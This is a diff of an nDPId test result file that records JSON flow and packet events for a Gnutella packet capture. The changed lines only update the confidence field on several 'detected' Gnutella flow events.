00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":528,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":75077,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":75077,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0FTlAAIAG3SgKAAIPUMGrksQm0jCYt6bIAAAAAIAC+vCV5QAAAgQFtAEDAwgBAQQC"} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":529,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":3,"flow_last_seen":75077,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":75077,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0d8RAAIAGrlIKAAIPcfxWosQp1q4KULlcAAAAAIAC+vBA7QAAAgQFtAEDAwgBAQQC"} @@ -499,7 +499,7 @@ 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":539,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":153,"flow_packet_id":1,"flow_last_seen":75359,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":75359,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0DLlAAIAGV04KAAIP20avZ8RaENsT5fMFAAAAAIAC+vABQgAAAgQFtAEDAwgBAQQC"} 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":540,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":2,"flow_last_seen":75482,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":75482,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAvIAAEAGpZCcOSoCCgACD4LExFUAh74BMu52DGAS\/\/8XLwAAAgQFtA=="} 00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":541,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":3,"flow_last_seen":75482,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":75482,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoZAVAAIAGxIAKAAIPnDkqAsRVgsQy7nYMAIe+AlAQ+vAz+wAA"} -00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":542,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":74328,"flow_last_seen":75501,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":597,"flow_tot_l4_payload_len":597,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":75501,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"156.57.42.2","src_port":50261,"dst_port":33476,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":542,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":74328,"flow_last_seen":75501,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":597,"flow_tot_l4_payload_len":597,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":75501,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"156.57.42.2","src_port":50261,"dst_port":33476,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00438{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":545,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":153,"flow_packet_id":2,"flow_last_seen":75731,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":75731,"pkt":"CAAn5uVZUlQAEjUCCABFAAAoAvQAAP8GIh\/bRq9nCgACDxDbxFoAAAAAE+XzBlAUAAA88gAA"} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":546,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":3,"flow_last_seen":76122,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":76122,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0UtJAAIAGDgUKAAIPTn0\/YcQwGMq9KdLlAAAAAIAC+vBtKAAAAgQFtAEDAwgBAQQC"} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":547,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":3,"flow_last_seen":76122,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":76122,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0R05AAIAGN+MKAAIPdqf43MQv9oQzn2SqAAAAAIAC+vCljgAAAgQFtAEDAwgBAQQC"} @@ -520,7 +520,7 @@ 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":565,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":151,"flow_packet_id":2,"flow_last_seen":78374,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":78374,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0GYhAAIAGqN8KAAIPXwrNQ8RYvPy3IUp\/AAAAAIAC+vC4zAAAAgQFtAEDAwgBAQQC"} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":566,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":150,"flow_packet_id":2,"flow_last_seen":78374,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":78374,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0xOdAAIAGV+0KAAIPSbaIKsRXbOGIdOVZAAAAAIAC+vD3KAAAAgQFtAEDAwgBAQQC"} 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":567,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":152,"flow_packet_id":2,"flow_last_seen":78374,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":78374,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0bsZAAIAGE88KAAIPcf\/6IMRZzacG03PuAAAAAIAC+vDvLQAAAgQFtAEDAwgBAQQC"} -00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":570,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":63001,"flow_last_seen":78517,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":78517,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.129.196.84","src_port":50198,"dst_port":9915,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":570,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":63001,"flow_last_seen":78517,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":78517,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.129.196.84","src_port":50198,"dst_port":9915,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":577,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":3,"flow_last_seen":79200,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":79200,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0KchAAIAGHhYKAAIPfNop\/cQ+5wgF3IcnAAAAAIAC+vCI7gAAAgQFtAEDAwgBAQQC"} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":578,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":3,"flow_last_seen":79201,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":79201,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0UW1AAIAGasEKAAIPsIqB\/MRDbToYK0huAAAAAIAC+vCjcgAAAgQFtAEDAwgBAQQC"} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":579,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":3,"flow_last_seen":79201,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":79201,"pkt":"UlQAEjUCCAAn5uVZCABFAAA01kRAAIAGdAUKAAIPcGk0AsQ\/GPASVmSCAAAAAIAC+vBvnQAAAgQFtAEDAwgBAQQC"} @@ -677,7 +677,7 @@ 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":675,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":221,"flow_packet_id":1,"flow_last_seen":83805,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":83805,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0d8ZAAIAGrlAKAAIPcfxWosRbJBfMcOElAAAAAIAC+vAJaQAAAgQFtAEDAwgBAQQC"} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":676,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":221,"flow_packet_id":2,"flow_last_seen":84026,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":84026,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAwcAAEAGoxhx\/FaiCgACDyQXxFsAmFgBzHDhJmAS\/\/\/UxQAAAgQFtA=="} 00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":677,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":221,"flow_packet_id":3,"flow_last_seen":84026,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":84026,"pkt":"UlQAEjUCCAAn5uVZCABFAAAod8dAAIAGrlsKAAIPcfxWosRbJBfMcOEmAJhYAlAQ+vDxkQAA"} -00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":678,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":83805,"flow_last_seen":84027,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":84027,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.252.86.162","src_port":50267,"dst_port":9239,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":678,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":83805,"flow_last_seen":84027,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":84027,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.252.86.162","src_port":50267,"dst_port":9239,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":685,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":151,"flow_packet_id":3,"flow_last_seen":84388,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":84388,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0GYlAAIAGqN4KAAIPXwrNQ8RYvPy3IUp\/AAAAAIAC+vC4zAAAAgQFtAEDAwgBAQQC"} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":686,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":150,"flow_packet_id":3,"flow_last_seen":84388,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":84388,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0xOhAAIAGV+wKAAIPSbaIKsRXbOGIdOVZAAAAAIAC+vD3KAAAAgQFtAEDAwgBAQQC"} 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":687,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":152,"flow_packet_id":3,"flow_last_seen":84388,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":84388,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0bsdAAIAGE84KAAIPcf\/6IMRZzacG03PuAAAAAIAC+vDvLQAAAgQFtAEDAwgBAQQC"} @@ -691,10 +691,10 @@ 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":691,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":225,"flow_packet_id":1,"flow_last_seen":84593,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":84593,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0KpdAAIAGI14KAAIP2qTGG8Rf6yo8NHW4AAAAAIAC+vBl2QAAAgQFtAEDAwgBAQQC"} 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":692,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":222,"flow_packet_id":2,"flow_last_seen":84824,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":84824,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAwwAAEAGn4vS0flUCgACD2CvxFwAmkwBaX1M0WAS\/\/+X6wAAAgQFtA=="} 00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":693,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":222,"flow_packet_id":3,"flow_last_seen":84824,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":84824,"pkt":"UlQAEjUCCAAn5uVZCABFAAAov8FAAIAGYtkKAAIP0tH5VMRcYK9pfUzRAJpMAlAQ+vC0twAA"} -00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":694,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":84592,"flow_last_seen":84825,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":84825,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"210.209.249.84","src_port":50268,"dst_port":24751,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":694,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":84592,"flow_last_seen":84825,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":84825,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"210.209.249.84","src_port":50268,"dst_port":24751,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":696,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":223,"flow_packet_id":2,"flow_last_seen":84862,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":84862,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAw4AAEAGBkbaZ4sCCgACDwxyxF0Am0YBMJyEhWAS\/\/9aEAAAAgQFtA=="} 00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":697,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":223,"flow_packet_id":3,"flow_last_seen":84863,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":84863,"pkt":"UlQAEjUCCAAn5uVZCABFAAAosEBAAIAG2RYKAAIP2meLAsRdDHIwnISFAJtGAlAQ+vB23AAA"} -00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":698,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":84592,"flow_last_seen":84863,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":84863,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"218.103.139.2","src_port":50269,"dst_port":3186,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":698,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":84592,"flow_last_seen":84863,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":84863,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"218.103.139.2","src_port":50269,"dst_port":3186,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00554{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":710,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":85607,"flow_last_seen":85607,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":85607,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"1.172.184.48","src_port":50272,"dst_port":13298,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":710,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":226,"flow_packet_id":1,"flow_last_seen":85607,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":85607,"pkt":"UlQAEjUCCAAn5uVZCABFAAA07jxAAIAGRpwKAAIPAay4MMRgM\/L4VuGpAAAAAIAC+vDb4AAAAgQFtAEDAwgBAQQC"} 00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":711,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":85607,"flow_last_seen":85607,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":85607,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.179.18.242","src_port":50273,"dst_port":47329,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -737,10 +737,10 @@ 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":743,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":241,"flow_packet_id":1,"flow_last_seen":88706,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":88706,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0QYJAAIAGx78KAAIPYteCnMRvMHWjnzXtAAAAAIAC+vC0KwAAAgQFtAEDAwgBAQQC"} 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":746,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":239,"flow_packet_id":2,"flow_last_seen":88816,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":88816,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAyoAAEAGurFLhWVdCgACD8yPxG0AoxYBwnfwg2AS\/\/+AiAAAAgQFtA=="} 00439{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":747,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":239,"flow_packet_id":3,"flow_last_seen":88816,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":88816,"pkt":"UlQAEjUCCAAn5uVZCABFAAAocclAAIAGzBUKAAIPS4VlXcRtzI\/Cd\/CDAKMWAlAQ+vCdVAAA"} -00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":748,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":88704,"flow_last_seen":88817,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":88817,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"75.133.101.93","src_port":50285,"dst_port":52367,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":748,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":88704,"flow_last_seen":88817,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":88817,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"75.133.101.93","src_port":50285,"dst_port":52367,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":750,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":238,"flow_packet_id":2,"flow_last_seen":88832,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":88832,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAywAAEAGIK1onOJICgACD9AKxGwApBABxlioc2AS\/\/8tOgAAAgQFtA=="} 00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":751,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":238,"flow_packet_id":3,"flow_last_seen":88832,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":88832,"pkt":"UlQAEjUCCAAn5uVZCABFAAAo5t9AAIAGvPwKAAIPaJziSMRs0ArGWKhzAKQQAlAQ+vBKBgAA"} -00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":752,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":88704,"flow_last_seen":88833,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":88833,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"104.156.226.72","src_port":50284,"dst_port":53258,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 